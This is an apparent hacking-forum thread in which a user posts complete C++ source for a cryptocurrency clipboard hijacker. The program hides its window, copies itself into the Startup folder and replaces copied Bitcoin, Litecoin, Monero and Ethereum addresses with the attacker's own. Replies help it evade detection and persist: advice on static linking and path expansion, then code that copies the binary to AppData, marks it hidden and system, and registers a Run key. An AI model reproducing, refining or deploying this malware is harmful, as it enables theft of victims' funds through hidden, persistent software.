C++ Cryptostealer

[EuroStar]

Hello! I created these days a cryptostealer in C++ and made it to add itself to startup but there are a few more things that I need to do and I am asking for your help:
1. Is it possible to make it hidden in startup folder? I tried with SetFileAttributesA("\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cryptostealer.exe\"", FILE_ATTRIBUTE_HIDDEN); but didn't work.
2. Is it possible to make it work without Visual C++ Redistributables?
3. If you find more regex patterns please post them so I can add to the source.

Thanks!

#include <iostream>
#include <Windows.h>
#include <regex>
#include <string>
#include <algorithm>
#include <wchar.h>
#include <KnownFolders.h>
#include <setupapi.h>
#include <tchar.h>
#include <devpkey.h>
#include <fstream>

using namespace std;

HANDLE clip;
string clipboard = "";

string bitcoin = "bitcoin address";
string litecoin = "litecoin address";
string monero = "monero address";
string ethereum = "ethereum address";

regex bitpat{ "^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$" };
regex litpat{ "^[LM3][a-km-zA-HJ-NP-Z1-9]{26,33}$" };
regex monpat{ "^4([0-9]|[A-B])(.){93}" };
regex ethpat{ "^0x[a-fA-F0-9]{40}$" };

const char* copy1 = "echo F | xcopy /S /Q /Y /F \"cryptostealer.exe\" \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"";

int main()
{
    HWND hWnd = GetConsoleWindow();
    ShowWindow(hWnd, SW_HIDE);

    system(copy1);

    while (true)
    {
        if (OpenClipboard(NULL))
        {
            clip = GetClipboardData(CF_TEXT);
            clipboard = (char*)GetClipboardData(CF_TEXT);

            CloseClipboard();

            bool bitmatch = regex_search(clipboard, bitpat);

            if (bitmatch)
            {
                const char* output = bitcoin.c_str();
                const size_t len = strlen(output) + 1;

                HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);

                memcpy(GlobalLock(hMem), output, len);

                GlobalUnlock(hMem);

                OpenClipboard(0);
                EmptyClipboard();
                SetClipboardData(CF_TEXT, hMem);

                CloseClipboard();
            }

            bool litmatch = regex_search(clipboard, litpat);

            if (litmatch)
            {
                const char* output = litecoin.c_str();
                const size_t len = strlen(output) + 1;

                HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);

                memcpy(GlobalLock(hMem), output, len);

                GlobalUnlock(hMem);

                OpenClipboard(0);
                EmptyClipboard();
                SetClipboardData(CF_TEXT, hMem);

                CloseClipboard();
            }

            bool monmatch = regex_search(clipboard, monpat);

            if (monmatch)
            {
                const char* output = monero.c_str();
                const size_t len = strlen(output) + 1;

                HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);

                memcpy(GlobalLock(hMem), output, len);

                GlobalUnlock(hMem);

                OpenClipboard(0);
                EmptyClipboard();
                SetClipboardData(CF_TEXT, hMem);

                CloseClipboard();
            }

            bool ethmatch = regex_search(clipboard, ethpat);

            if (ethmatch)
            {
                const char* output = ethereum.c_str();
                const size_t len = strlen(output) + 1;

                HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);

                memcpy(GlobalLock(hMem), output, len);

                GlobalUnlock(hMem);

                OpenClipboard(0);
                EmptyClipboard();
                SetClipboardData(CF_TEXT, hMem);

                CloseClipboard();
            }

        }
        Sleep(500);
    }
    return 0;

}

 

[1ChdaOeRrY]

2. Is it possible to make it work without Visual C++ Redistributables?

Static linking will fix it, but it will make the Exe larger

 

[1ChdaOeRrY]

1. Is it possible to make it hidden in startup folder? I tried with SetFileAttributesA("\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\cryptostealer.exe\"", FILE_ATTRIBUTE_HIDDEN); but didn't work.

Most Windows functions do not automatically expand variables like %APPDATA% and %WINDIR%. You need to use ExpandEnvironmentStringsA to get the actual path

 

[knxit]

Here is how you do it, it has to be UNICODE, you want to work it everywhere.

WCHAR wszMainBotFile[MAX_PATH];
WCHAR wszAppData[MAX_PATH];
WCHAR wszInstallPath[MAX_PATH];

GetModuleFileNameW(NULL, wszMainBotFile, sizeof(wszMainBotFile));

ExpandEnvironmentStringsW(L"%appdata%", wszAppData sizeof(wszAppData));

wsprintfW(wszInstallPath, L"%s\\hungrycryptoworm.exe", wszAppData);

if (CopyFileW(wszMainBotFile, wszInstallPath, FALSE))
{            
SetFileAttributesW(wszInstallPath, FILE_ATTRIBUTE_HIDDEN || FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_READONLY);

  if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, KEY_ALL_ACCESS, &hndKey) == ERROR_SUCCESS)
   {                   
         RegSetValueExW(hndKey, L"HungyCryptoWorm", 0, REG_SZ, (BYTE *)wszInstallPath, (wcslen(wszInstallPath) + 1) * 2);              
                      
           RegCloseKey(hndKey);
           }

ShellExecuteW(NULL, L"open", wszInstallPath, 0, 0, SW_HIDE);

Sleep(100);

ExitProcess(0);

  }

its for currentuser install, you can make it try to install to %windir% and create regkey under HKEY_LOCAL_MACHINE